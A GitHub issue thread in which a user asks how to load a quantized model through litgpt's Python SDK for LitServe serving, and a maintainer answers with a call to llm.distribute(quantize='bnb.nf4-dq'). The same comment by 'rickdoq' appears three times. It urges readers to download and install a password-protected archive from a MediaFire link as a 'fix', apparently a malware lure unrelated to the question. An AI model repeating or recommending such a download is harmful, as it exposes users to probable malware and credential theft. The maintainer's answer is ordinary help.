### ISSUE TITLE
Way to load quantized model on the fly through Python SDK

### ISSUE THREAD

**Issue by sovit-123** [Lightning-AI/litgpt#1705]
As I understand, its quite straightforward to load a 4-bit quantized model with `litgpt serve` through CLI using:
`litgpt serve google/gemma-2-2b-it --quantize bnb.nf4-dq`

However, is there a way to load a quantized model for serving through the Python SDK, for example, in the following code?
```python
import litgpt
import litserve as ls

class SimpleLitAPI(ls.LitAPI):
    def setup(self, device):
        self.llm = litgpt.LLM.load('google/gemma-2-2b-it')

    def decode_request(self, request):
        return request['prompt']

    def predict(self, prompt):
        return self.llm.generate(
            prompt, max_new_tokens=1024
        )

    def encode_response(self, output):
        return {'output': output}

if __name__ == '__main__':
    api = SimpleLitAPI()
    server = ls.LitServer(
        api, 
        accelerator='cuda', 
        devices=1
    )
    server.run(port=8000)
```

Went through source code but could not find anything.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rasbt** [comment]
Hi there,

the quantization setting is actually in `llm.distribute`. The reason is that quantization depends on the device being used, and the devices get controlled there.

I.e., what you can do is change

```python
import litgpt
import litserve as ls

class SimpleLitAPI(ls.LitAPI):
    def setup(self, device):
        self.llm = litgpt.LLM.load('google/gemma-2-2b-it')
```

to

```python
import litgpt
import litserve as ls

class SimpleLitAPI(ls.LitAPI):
    def setup(self, device):
        self.llm = litgpt.LLM.load('google/gemma-2-2b-it')
        self.llm.distribute(quantize="bnb.nf4-dq")
```

I hope this solves it! Please let me know (and feel free to reopen) in case you bumb into issues with this.

**Comment by sovit-123** [comment]
Thank you.
